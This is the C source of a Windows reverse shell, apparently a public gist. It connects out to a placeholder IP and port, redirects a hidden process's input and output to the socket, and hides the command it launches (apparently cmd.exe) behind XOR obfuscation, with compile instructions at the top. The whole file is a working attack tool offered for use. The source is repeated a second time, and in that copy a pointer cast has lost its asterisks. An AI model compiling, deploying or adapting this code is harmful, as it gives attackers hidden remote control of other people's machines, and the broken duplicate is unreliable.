qtc-de/windows-reverse-shell.c

## windows-reverse-shell.c
/*
 * Simple Windows reverse shell. For educational purposes only!
 *
 * Compile on Windows (developer prompt):
 *   C:\> cl windows-reverse-shell.c
 *
 * Compile on Linux (mingw):
 *   $ x86_64-w64-mingw32-gcc windows-reverse-shell.c -o shell.exe -lws2_32
 */
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32")
#define REMOTE_IP "<IP>"
#define REMOTE_PORT <PORT>

long nError;
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char ip_addr[16];
STARTUPINFO si;
PROCESS_INFORMATION pi;

int main()
{
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

    struct hostent *host;
    host = gethostbyname(REMOTE_IP);
    strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host -> h_addr)));

    hax.sin_family = AF_INET;
    hax.sin_port = htons(REMOTE_PORT);
    hax.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
    if( WSAGetLastError() == 0 ) {

        memset(&si, 0, sizeof(si));

        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESTDHANDLES;
        si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)Winsock;

        char *myArray = "\x22\x02\x3d\x16\x11\x50\x40\x40\x46\x12\x24\x2b\x45\x42\x45\x01\x55\x02\x03\x6b\x52\x5c\x56\x1d\x0b\x19\x0d";
        char *myKey = "a8aAx>$/1axx<11d81171123nah";
        char command[28];

        for(int i=0; i<27; ++i)
            command[i] = (char)(myArray[i] ^ myKey[i]);

        if( !CreateProcess(NULL, command, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi) ) {
            nError = GetLastError();
            printf("[-] CreateProcess(... - Error: %d\n", nError);
            exit(1);
        }

        printf("[+] Process created.\n");

    } else {
        nError = GetLastError();
        printf("[+] WSAConnect(... - Error: %d\n", nError);
        exit(1);
    }
}
	/*
	* Simple Windows reverse shell. For educational purposes only!
	*
	* Compile on Windows (developer prompt):
	* C:\> cl windows-reverse-shell.c
	*
	* Compile on Linux (mingw):
	* $ x86_64-w64-mingw32-gcc windows-reverse-shell.c -o shell.exe -lws2_32
	*/
	#include <winsock2.h>
	#include <stdio.h>

	#pragma comment(lib, "ws2_32")
	#define REMOTE_IP "<IP>"
	#define REMOTE_PORT <PORT>

	long nError;
	WSADATA wsaData;
	SOCKET Winsock;
	SOCKET Sock;
	struct sockaddr_in hax;
	char ip_addr[16];
	STARTUPINFO si;
	PROCESS_INFORMATION pi;

	int main()
	{
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	struct hostent *host;
	host = gethostbyname(REMOTE_IP);
	strcpy(ip_addr, inet_ntoa(((struct in_addr )host -> h_addr)));

	hax.sin_family = AF_INET;
	hax.sin_port = htons(REMOTE_PORT);
	hax.sin_addr.s_addr = inet_addr(ip_addr);

	WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
	if( WSAGetLastError() == 0 ) {

	memset(&si, 0, sizeof(si));

	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESTDHANDLES;
	si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)Winsock;

	char *myArray = "\x22\x02\x3d\x16\x11\x50\x40\x40\x46\x12\x24\x2b\x45\x42\x45\x01\x55\x02\x03\x6b\x52\x5c\x56\x1d\x0b\x19\x0d";
	char *myKey = "a8aAx>$/1axx<11d81171123nah";
	char command[28];

	for(int i=0; i<27; ++i)
	command[i] = (char)(myArray[i] ^ myKey[i]);

	if( !CreateProcess(NULL, command, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi) ) {
	nError = GetLastError();
	printf("[-] CreateProcess(... - Error: %d\n", nError);
	exit(1);
	}

	printf("[+] Process created.\n");

	} else {
	nError = GetLastError();
	printf("[+] WSAConnect(... - Error: %d\n", nError);
	exit(1);
	}
	}